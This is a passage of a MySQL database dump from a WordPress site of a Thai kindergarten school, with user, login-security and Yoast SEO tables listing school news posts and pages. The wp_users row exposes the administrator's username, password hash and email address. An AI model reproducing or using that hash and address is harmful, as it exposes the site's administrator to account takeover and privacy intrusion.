  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES
(1,'admin','$wp$2y$10$BzIUFR0KIHGTAyL/PFieJuaDj8rTrlOx0HvrB.EyVpnxZiVrYHH8S','admin','patcharapol@ro.ac.th','http://watprato.ssk.in.th','2024-07-27 13:27:17','',0,'admin');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpc_accesslocks`
--

DROP TABLE IF EXISTS `wp_wpc_accesslocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpc_accesslocks` (
  `accesslock_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `accesslock_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `release_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `accesslock_IP` varchar(100) NOT NULL DEFAULT '',
  `reason` varchar(200) DEFAULT NULL,
  `unlocked` smallint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`accesslock_ID`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpc_accesslocks`
--

LOCK TABLES `wp_wpc_accesslocks` WRITE;
/*!40000 ALTER TABLE `wp_wpc_accesslocks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpc_accesslocks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpc_login_fails`
--

DROP TABLE IF EXISTS `wp_wpc_login_fails`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpc_login_fails` (
  `login_attempt_ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `login_attempt_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `login_attempt_IP` varchar(100) NOT NULL DEFAULT '',
  `failed_user` varchar(200) NOT NULL DEFAULT '',
  `failed_pass` varchar(200) NOT NULL DEFAULT '',
  `reason` varchar(200) DEFAULT NULL,
  PRIMARY KEY (`login_attempt_ID`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 COLLATE=latin1_swedish_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpc_login_fails`
--

LOCK TABLES `wp_wpc_login_fails` WRITE;
/*!40000 ALTER TABLE `wp_wpc_login_fails` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpc_login_fails` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_yoast_indexable`
--

DROP TABLE IF EXISTS `wp_yoast_indexable`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_yoast_indexable` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `permalink` longtext DEFAULT NULL,
  `permalink_hash` varchar(40) DEFAULT NULL,
  `object_id` bigint(20) DEFAULT NULL,
  `object_type` varchar(32) NOT NULL,
  `object_sub_type` varchar(32) DEFAULT NULL,
  `author_id` bigint(20) DEFAULT NULL,
  `post_parent` bigint(20) DEFAULT NULL,
  `title` text DEFAULT NULL,
  `description` mediumtext DEFAULT NULL,
  `breadcrumb_title` text DEFAULT NULL,
  `post_status` varchar(20) DEFAULT NULL,
  `is_public` tinyint(1) DEFAULT NULL,
  `is_protected` tinyint(1) DEFAULT 0,
  `has_public_posts` tinyint(1) DEFAULT NULL,
  `number_of_pages` int(11) unsigned DEFAULT NULL,
  `canonical` longtext DEFAULT NULL,
  `primary_focus_keyword` varchar(191) DEFAULT NULL,
  `primary_focus_keyword_score` int(3) DEFAULT NULL,
  `readability_score` int(3) DEFAULT NULL,
  `is_cornerstone` tinyint(1) DEFAULT 0,
  `is_robots_noindex` tinyint(1) DEFAULT 0,
  `is_robots_nofollow` tinyint(1) DEFAULT 0,
  `is_robots_noarchive` tinyint(1) DEFAULT 0,
  `is_robots_noimageindex` tinyint(1) DEFAULT 0,
  `is_robots_nosnippet` tinyint(1) DEFAULT 0,
  `twitter_title` text DEFAULT NULL,
  `twitter_image` longtext DEFAULT NULL,
  `twitter_description` longtext DEFAULT NULL,
  `twitter_image_id` varchar(191) DEFAULT NULL,
  `twitter_image_source` text DEFAULT NULL,
  `open_graph_title` text DEFAULT NULL,
  `open_graph_description` longtext DEFAULT NULL,
  `open_graph_image` longtext DEFAULT NULL,
  `open_graph_image_id` varchar(191) DEFAULT NULL,
  `open_graph_image_source` text DEFAULT NULL,
  `open_graph_image_meta` mediumtext DEFAULT NULL,
  `link_count` int(11) DEFAULT NULL,
  `incoming_link_count` int(11) DEFAULT NULL,
  `prominent_words_version` int(11) unsigned DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  `language` varchar(32) DEFAULT NULL,
  `region` varchar(32) DEFAULT NULL,
  `schema_page_type` varchar(64) DEFAULT NULL,
  `schema_article_type` varchar(64) DEFAULT NULL,
  `has_ancestors` tinyint(1) DEFAULT 0,
  `estimated_reading_time_minutes` int(11) DEFAULT NULL,
  `version` int(11) DEFAULT 1,
  `object_last_modified` datetime DEFAULT NULL,
  `object_published_at` datetime DEFAULT NULL,
  `inclusive_language_score` int(3) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `object_type_and_sub_type` (`object_type`,`object_sub_type`),
  KEY `object_id_and_type` (`object_id`,`object_type`),
  KEY `permalink_hash_and_object_type` (`permalink_hash`,`object_type`),
  KEY `subpages` (`post_parent`,`object_type`,`post_status`,`object_id`),
  KEY `prominent_words` (`prominent_words_version`,`object_type`,`object_sub_type`,`post_status`),
  KEY `published_sitemap_index` (`object_published_at`,`is_robots_noindex`,`object_type`,`object_sub_type`)
) ENGINE=InnoDB AUTO_INCREMENT=112 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_yoast_indexable`
--

LOCK TABLES `wp_yoast_indexable` WRITE;
/*!40000 ALTER TABLE `wp_yoast_indexable` DISABLE KEYS */;
INSERT INTO `wp_yoast_indexable` VALUES
(1,'http://watprato.ssk.in.th/?cat=1','32:0c349f869a62b02a7862cde2cc6fd264',1,'term','category',NULL,NULL,NULL,NULL,'ข่าวกิจกรรมนักเรียน',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,NULL,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2024/06/441607127_122148221702202781_3633016050209358926_n.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2024/06/441607127_122148221702202781_3633016050209358926_n.jpg',NULL,'first-content-image',NULL,0,NULL,NULL,'2022-12-20 07:15:41','2024-06-05 19:22:06',1,NULL,NULL,NULL,NULL,0,NULL,2,'2024-06-06 09:22:06','2022-07-22 06:53:05',NULL),
(2,'http://watprato.ssk.in.th/?cat=3','32:f6b5f2334b2cb9f827f81b6d40798419',3,'term','category',NULL,NULL,NULL,NULL,'ผลงานนักเรียน/ครู',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:41','2022-12-23 09:09:12',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-12-20 07:33:40','2022-08-07 01:32:45',NULL),
(3,'http://watprato.ssk.in.th/?cat=5','32:9eabd158ee3a2b44976b6431ef8be856',5,'term','category',NULL,NULL,NULL,NULL,'ข่าวกิจกรรมโรงเรียน',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,NULL,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2024/06/447852358_122152884128202781_5056565582443310750_n.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2024/06/447852358_122152884128202781_5056565582443310750_n.jpg',NULL,'first-content-image',NULL,0,NULL,NULL,'2022-12-20 07:15:41','2024-06-05 19:19:12',1,NULL,NULL,NULL,NULL,0,NULL,2,'2024-06-06 09:19:12','2022-07-22 07:02:15',NULL),
(6,'http://watprato.ssk.in.th/?cat=13','33:02d3a3743451aabbc4d12c2a99e7548d',13,'term','category',NULL,NULL,NULL,NULL,'best practice',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:41','2023-03-13 04:05:53',1,NULL,NULL,NULL,NULL,0,NULL,2,NULL,NULL,NULL),
(8,'http://watprato.ssk.in.th/?author=1','35:ac2e57aad5992d259e91847253f825d2',1,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://0.gravatar.com/avatar/6352c24c2b687fdad91ba646ad563ff6?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://0.gravatar.com/avatar/6352c24c2b687fdad91ba646ad563ff6?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2022-12-20 07:15:42','2024-06-04 23:45:01',1,NULL,NULL,NULL,NULL,0,NULL,2,'2024-06-05 03:29:19','2022-07-22 05:46:44',NULL),
(20,'http://watprato.ssk.in.th/?p=108','32:7bf48461a791ed72e89ad77b0b27dbb7',108,'post','post',1,0,NULL,NULL,'นายอนุศักดิ์ พันธ์งาม เป็นประธานถวายเทียนพรรษาเนื่องในเทศกาลวันเข้าพรรษา','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/07/293307280_5632641913433468_741025477405627152_n-2.jpg',NULL,'120','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/07/293307280_5632641913433468_741025477405627152_n-2.jpg','120','featured-image','{\"width\":1478,\"height\":1108,\"filesize\":401697,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/07/293307280_5632641913433468_741025477405627152_n-2.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/07/293307280_5632641913433468_741025477405627152_n-2.jpg\",\"size\":\"full\",\"id\":120,\"alt\":\"\",\"pixels\":1637624,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:42','2022-12-22 20:44:40',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-12-20 08:04:00','2022-07-22 06:53:05',NULL),
(37,'http://watprato.ssk.in.th/?p=127','32:3ca45e114b440a88838b1cd4fded5cd9',127,'post','post',1,0,NULL,NULL,'สวนสนามในวันสถาปนาลูกเสือแห่งชาติ โดยสำนักงานลูกเสือจังหวัดศรีสะเกษ ณ สนามหน้าศาลากลางจังหวัดศรีสะเกษ','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://web054.ssk.in.th/wp-content/uploads/2022/07/291318979_5605531412811185_7992127248871825328_n.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://web054.ssk.in.th/wp-content/uploads/2022/07/291318979_5605531412811185_7992127248871825328_n.jpg',NULL,'first-content-image',NULL,0,NULL,NULL,'2022-12-20 07:15:44','2022-12-23 19:08:37',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:15:34','2022-07-22 07:02:15',NULL),
(52,'http://watprato.ssk.in.th/?p=271','32:e9411b7cf96b7ca1c5d6ce1f840bd3b2',271,'post','post',1,0,NULL,NULL,'กิจกรรมจิตอาสา&#8221; เราทำความดีด้วยหัวใจ &#8220;','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/297234639_5689452871085705_2185214272782236298_n.jpg',NULL,'281','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/297234639_5689452871085705_2185214272782236298_n.jpg','281','featured-image','{\"width\":2048,\"height\":1365,\"filesize\":563057,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/08/297234639_5689452871085705_2185214272782236298_n.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/08/297234639_5689452871085705_2185214272782236298_n.jpg\",\"size\":\"full\",\"id\":281,\"alt\":\"\",\"pixels\":2795520,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:44','2022-12-23 23:43:34',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:15:17','2022-08-06 13:18:09',NULL),
(63,'http://watprato.ssk.in.th/?p=284','32:ef7ab3a5d2f231fd8ad7b0df7ea0d963',284,'post','post',1,0,NULL,NULL,'กิจกรรมวันภาษาไทยแห่งชาติ','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/296480572_5679760628721596_380171673645831295_n.jpg',NULL,'285','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/296480572_5679760628721596_380171673645831295_n.jpg','285','featured-image','{\"width\":2048,\"height\":1364,\"filesize\":209749,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/08/296480572_5679760628721596_380171673645831295_n.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/08/296480572_5679760628721596_380171673645831295_n.jpg\",\"size\":\"full\",\"id\":285,\"alt\":\"\",\"pixels\":2793472,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:46','2022-12-22 18:50:53',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:13:09','2022-08-07 01:13:07',NULL),
(65,'http://watprato.ssk.in.th/?p=287','32:8951e5cfd7382830b519a5a4618b353f',287,'post','post',1,0,NULL,NULL,'โรงเรียนของหนู EP9 : สอบรำวิชานาฏศิลป์','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/12.jpg',NULL,'288','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/12.jpg','288','featured-image','{\"width\":1456,\"height\":591,\"filesize\":214763,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/08/12.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/08/12.jpg\",\"size\":\"full\",\"id\":288,\"alt\":\"\",\"pixels\":860496,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:46','2022-12-22 13:17:54',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:19:52','2022-08-07 01:19:21',NULL),
(67,'http://watprato.ssk.in.th/?p=295','32:ba1d5f5008eb32d6ebeeec10dcc39456',295,'post','post',1,0,NULL,NULL,'จิตอาสา อนุบาล- ป.3','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/296210522_5676515235712802_2894657892486304377_n.jpg',NULL,'296','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/296210522_5676515235712802_2894657892486304377_n.jpg','296','featured-image','{\"width\":1280,\"height\":960,\"filesize\":211421,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/08/296210522_5676515235712802_2894657892486304377_n.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/08/296210522_5676515235712802_2894657892486304377_n.jpg\",\"size\":\"full\",\"id\":296,\"alt\":\"\",\"pixels\":1228800,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:46','2022-12-24 04:15:10',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:31:13','2022-08-07 01:22:12',NULL),
(69,'http://watprato.ssk.in.th/?p=298','32:4d45fef16f22cdc49c70972c5dfc0448',298,'post','post',1,0,NULL,NULL,'ร่วมพิธีเปิดการแข่งขันกีฬาสมาคมโรงเรียนประถมศึกษาประจําจังหวัด ภาคตะวันออกเฉียงเหนือ ครั้งที่ 5','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/295942059_5674334249264234_7355477364976387145_n.jpg',NULL,'299','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/295942059_5674334249264234_7355477364976387145_n.jpg','299','featured-image','{\"width\":1478,\"height\":971,\"filesize\":189778,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/08/295942059_5674334249264234_7355477364976387145_n.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/08/295942059_5674334249264234_7355477364976387145_n.jpg\",\"size\":\"full\",\"id\":299,\"alt\":\"\",\"pixels\":1435138,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:46','2022-12-23 10:49:59',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:23:45','2022-08-07 01:23:42',NULL),
(71,'http://watprato.ssk.in.th/?p=301','32:9e7d177cf970cddff25ac473370b34cf',301,'post','post',1,0,NULL,NULL,'อบรมคุณธรรมจริยธรรม','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/295533337_5665446880152971_5015430251011765101_n-1.jpg',NULL,'303','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/295533337_5665446880152971_5015430251011765101_n-1.jpg','303','featured-image','{\"width\":1477,\"height\":1108,\"filesize\":193785,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/08/295533337_5665446880152971_5015430251011765101_n-1.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/08/295533337_5665446880152971_5015430251011765101_n-1.jpg\",\"size\":\"full\",\"id\":303,\"alt\":\"\",\"pixels\":1636516,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:46','2022-12-23 13:55:25',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:26:07','2022-08-07 01:26:05',NULL),
(74,'http://watprato.ssk.in.th/?p=305','32:d6f6b1c58f323f30c1738653be5f6946',305,'post','post',1,0,NULL,NULL,'ร่วมกิจกรรมถวายเทียนพรรษา เนื่องในเทศกาลวันเข้าพรรษา','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/293307280_5632641913433468_741025477405627152_n.jpg',NULL,'306','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/08/293307280_5632641913433468_741025477405627152_n.jpg','306','featured-image','{\"width\":1478,\"height\":1108,\"filesize\":401697,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/08/293307280_5632641913433468_741025477405627152_n.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/08/293307280_5632641913433468_741025477405627152_n.jpg\",\"size\":\"full\",\"id\":306,\"alt\":\"\",\"pixels\":1637624,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:46','2022-12-24 18:42:02',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:27:30','2022-08-07 01:27:28',NULL),
(82,'http://watprato.ssk.in.th/?page_id=153','38:a1965c5bf4b14248e63ee7cc2a3bca3e',153,'post','page',1,0,NULL,NULL,'ข้อมูลพื้นฐานโรงเรียน','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-12-20 07:15:46','2023-08-02 22:11:02',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-07-22 08:03:42','0000-00-00 00:00:00',NULL),
(83,'http://watprato.ssk.in.th/?page_id=154','38:44eee18ce8f7650ab95e971848ce6e1c',154,'post','page',1,0,NULL,NULL,'ข้อมูลบุคลากร','draft',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-12-20 07:15:46','2023-08-02 22:11:02',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-07-22 08:05:04','0000-00-00 00:00:00',NULL),
(84,'http://watprato.ssk.in.th/?page_id=79','37:3bae5bb4e12fd020a53d0c8b9d2e8482',79,'post','page',1,0,NULL,NULL,'ติดต่อเรา','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:46','2023-08-02 22:11:02',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-07-22 06:11:52','2022-07-22 06:11:52',NULL),
(85,'http://watprato.ssk.in.th/?page_id=183','38:3ab3e08d905468e67a44c8a997e59810',183,'post','page',1,0,NULL,NULL,'ข้อมูลนักเรียน','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:46','2022-12-21 08:35:47',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-04 07:37:19','2022-08-04 07:37:19',NULL),
(86,'http://watprato.ssk.in.th/?page_id=193','38:ede69cae03d2fc9e1fd17bb9160faa85',193,'post','page',1,0,NULL,NULL,'คณะผู้บริหาร','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:46','2022-12-21 00:16:20',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-04 07:45:34','2022-08-04 07:45:34',NULL),
(87,'http://watprato.ssk.in.th/','26:5221f18cdda4f402ca1f04399d351b46',332,'post','page',1,0,'โรงเรียนอนุบาลวัดพระโต','โรงเรียนอนุบาลวัดพระโต สพป.ศรีสะเกษ เขต 1','หน้าแรก','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/12/โรงเรียนอนุบาลวัดพระโต.jpg',NULL,'381','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/12/โรงเรียนอนุบาลวัดพระโต.jpg','381','featured-image','{\"width\":1000,\"height\":500,\"filesize\":51217,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/12/โรงเรียนอนุบาลวัดพระโต.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/12/โรงเรียนอนุบาลวัดพระโต.jpg\",\"size\":\"full\",\"id\":381,\"alt\":\"\",\"pixels\":500000,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:46','2023-08-02 22:10:49',1,NULL,NULL,NULL,NULL,0,1,2,'2023-08-03 05:10:48','2022-12-20 06:47:07',NULL),
(89,'http://watprato.ssk.in.th/?p=137','32:afc95037ae81a6fbdcda570e4f717c85',137,'post','post',1,0,NULL,NULL,'ประชุมผู้ปกครอง ภาคเรียนที่ 1/2565','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/07/291726073_5603214949709498_770652681187322845_n.jpg',NULL,'132','featured-image',NULL,NULL,'http://watprato.ssk.in.th/wp-content/uploads/2022/07/291726073_5603214949709498_770652681187322845_n.jpg','132','featured-image','{\"width\":2048,\"height\":1365,\"filesize\":278906,\"url\":\"http://watprato.ssk.in.th/wp-content/uploads/2022/07/291726073_5603214949709498_770652681187322845_n.jpg\",\"path\":\"/var/www/web054/html/wp-content/uploads/2022/07/291726073_5603214949709498_770652681187322845_n.jpg\",\"size\":\"full\",\"id\":132,\"alt\":\"\",\"pixels\":2795520,\"type\":\"image/jpeg\"}',0,NULL,NULL,'2022-12-20 07:15:46','2022-12-27 01:16:02',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:29:27','2022-07-22 07:03:52',NULL),
(90,'http://watprato.ssk.in.th/?p=310','32:fc999c6604ef1c90ce71543c30847bfa',310,'post','post',1,0,NULL,NULL,'ทดสอบส่งข่าวผลงานนักเรียน 1','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:47','2022-12-21 06:48:30',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:32:47','2022-08-07 01:32:45',NULL),
(91,'http://watprato.ssk.in.th/?p=311','32:de09bdfd1ae2ab34d2a859d662a4cf25',311,'post','post',1,0,NULL,NULL,'ทดสอบส่งข่าวผลงานนักเรียน 2','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:48','2022-12-21 03:02:22',1,NULL,NULL,NULL,NULL,0,NULL,2,'2022-08-07 01:32:55','2022-08-07 01:32:53',NULL),
(92,'http://watprato.ssk.in.th/?p=312','32:14f42b7bba49aeb3b1e3dd581da179ff',312,'post','post',1,0,NULL,NULL,'ทดสอบส่งข่าวประชาสัมพันธ์ 1','trash',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:48','2024-06-04 23:44:51',1,NULL,NULL,NULL,NULL,0,NULL,2,'2024-06-05 06:44:51','2022-08-07 01:33:18',0),
(93,'http://watprato.ssk.in.th/?p=313','32:8e523ae5e2af2ae6e9230e7bc5044133',313,'post','post',1,0,NULL,NULL,'ทดสอบส่งข่าวประชาสัมพันธ์ 2','trash',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2022-12-20 07:15:48','2024-06-04 23:45:01',1,NULL,NULL,NULL,NULL,0,NULL,2,'2024-06-05 06:45:01','2022-08-07 01:33:25',0),
(94,NULL,NULL,NULL,'system-page','404',NULL,NULL,'Page not found %%sep%% %%sitename%%',NULL,'Error 404: Page not found',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-12-20 07:15:49','2022-12-21 00:16:14',1,NULL,NULL,NULL,NULL,0,NULL,1,NULL,NULL,NULL),
(95,NULL,NULL,NULL,'system-page','search-result',NULL,NULL,'You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%',NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-12-20 07:15:49','2022-12-22 04:20:09',1,NULL,NULL,NULL,NULL,0,NULL,1,NULL,NULL,NULL),
(96,NULL,NULL,NULL,'date-archive',NULL,NULL,NULL,'%%date%% %%page%% %%sep%% %%sitename%%','',NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2022-12-20 07:15:49','2023-08-02 20:58:05',1,NULL,NULL,NULL,NULL,0,NULL,1,NULL,NULL,NULL),
(97,'http://watprato.ssk.in.th/','26:5221f18cdda4f402ca1f04399d351b46',NULL,'home-page',NULL,NULL,NULL,'%%sitename%% %%page%% %%sep%% %%sitedesc%%','','Home',NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,'%%sitename%%','','','0',NULL,NULL,NULL,NULL,NULL,'2022-12-20 07:16:50','2024-06-04 20:31:37',1,NULL,NULL,NULL,NULL,0,NULL,2,'2024-06-05 03:29:19','2022-07-22 06:53:05',NULL),
